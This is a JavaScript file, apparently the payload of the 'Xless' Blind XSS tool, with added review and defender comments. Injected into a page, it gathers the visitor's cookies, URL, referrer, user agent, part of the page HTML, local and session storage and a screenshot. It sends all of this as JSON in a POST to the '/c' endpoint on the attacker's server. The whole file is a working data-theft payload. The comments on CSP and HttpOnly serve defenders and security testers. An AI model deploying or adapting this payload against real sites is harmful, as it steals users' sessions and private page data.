// Xless: The serverless Blind XSS app.
// Author: Mazin Ahmed <[email protected]>
// Console marker emitted as soon as the script runs; handy when looking for this payload in a page.
console.log("Loaded xless.");
// Shared record that collect_data() fills in and exfiltrate_loot() serializes as JSON.
var collected_data = {};
// The <script> element this file was loaded from; exfiltrate_loot() derives its endpoint from its src.
// NOTE(review): document.currentScript is null when the code is not running from a classic script element.
var curScript = document.currentScript;
// Normalises an absent value to the empty string so that every collected field holds a value.
// Only `undefined` is replaced; null, 0, false and "" are passed through unchanged.
function return_value(value) {
  if (value === undefined) {
    return "";
  }
  return value;
}
// Renders the whole <html> element with html2canvas (a global that the loader at the bottom of this
// file fetches from a CDN) and resolves with the result as a PNG data URL.
// allowTaint/useCORS let cross-origin images be drawn onto the canvas; the capture is fixed at 1024x768.
// `reject` is never called: if html2canvas rejects, this promise never settles.
function screenshot() {
return new Promise(function (resolve, reject) {
html2canvas(document.querySelector("html"), { letterRendering: 1, allowTaint: true, useCORS: true, width: 1024, height: 768}).then(function (canvas) {
resolve(return_value(canvas.toDataURL())) // png in dataURL format
});
});
}
// Fills the module-level collected_data record with page context and resolves with it.
// Every read is wrapped in its own try/catch, so an API that throws (e.g. storage access blocked by
// browser settings) leaves that field as "" instead of aborting the whole collection.
// Defender notes: cookies flagged HttpOnly are not visible through document.cookie and so never appear
// here; the "DOM" field is truncated to the first 8192 characters of the serialized document.
function collect_data() {
return new Promise(function (resolve, reject) {
// Initialise every field to "" so the JSON sent later always has the same key set.
collected_data["Cookies"] = collected_data["Location"] = collected_data["Referrer"] = collected_data["User-Agent"] = collected_data["Browser Time"] = collected_data["Origin"] = collected_data["DOM"] = collected_data["localStorage"] = collected_data["sessionStorage"] = collected_data["Screenshot"] = "";
try { collected_data["Location"] = return_value(location.toString()) } catch(e) {}
try { collected_data["Cookies"] = return_value(document.cookie) } catch(e) {}
try { collected_data["Referrer"] = return_value(document.referrer) } catch(e) {}
try { collected_data["User-Agent"] = return_value(navigator.userAgent); } catch(e) {}
try { collected_data["Browser Time"] = return_value(new Date().toTimeString()); } catch(e) {}
try { collected_data["Origin"] = return_value(location.origin); } catch(e) {}
try { collected_data["DOM"] = return_value(document.documentElement.outerHTML); } catch(e) {}
// Cap the serialized document so the report stays small.
collected_data["DOM"] = collected_data["DOM"].slice(0, 8192)
// toSource() is a non-standard, legacy-Firefox-only method; where it does not exist the call throws
// and the catch leaves the field as "".
try { collected_data["localStorage"] = return_value(localStorage.toSource()); } catch(e) {}
try { collected_data["sessionStorage"] = return_value(sessionStorage.toSource()); } catch(e) {}
// The try/catch here only covers a synchronous throw from screenshot(); a rejection of the promise
// it returns is not handled, in which case resolve() is never reached.
try {
screenshot().then(function(img) {
collected_data["Screenshot"] = img
resolve(collected_data)
});
} catch(e) {
resolve(collected_data)
}
});
}
// Sends collected_data as a JSON document to the "/c" path on the origin this script was loaded from.
// Fire-and-forget: the request is asynchronous and no response or error handler is attached.
// Defender notes: the observable signature is a cross-origin POST with Content-Type application/json
// to <script origin>/c; a Content-Security-Policy connect-src that does not allow that origin blocks
// the XMLHttpRequest.
function exfiltrate_loot() {
// Get the URI of our BXSS server
var uri = new URL(curScript.src);
var exf_url = uri.origin + "/c"
var xhr = new XMLHttpRequest()
xhr.open("POST", exf_url, true)
xhr.setRequestHeader("Content-Type", "application/json")
xhr.send(JSON.stringify(collected_data))
}
// Load the html2canvas dependency
// Injects a <script> tag for html2canvas into <head>; `script` is only a local slot, nothing is passed for it.
// The collection and upload chain (collect_data -> exfiltrate_loot) runs exclusively from this
// element's onload, so if the CDN load is blocked — e.g. by a script-src policy that does not allow
// cdn.jsdelivr.net — nothing below the console marker ever executes.
(function(d, script) {
script = d.createElement('script');
script.type = 'text/javascript';
script.async = true;
script.onload = function(){
// remote script has loaded
collect_data().then(function() {
exfiltrate_loot();
});
};
// Pinned html2canvas build fetched from a public CDN; see the note above on what blocking it prevents.
script.src = "https://cdn.jsdelivr.net/npm/[email protected]/dist/html2canvas.min.js";
d.getElementsByTagName('head')[0].appendChild(script);
}(document));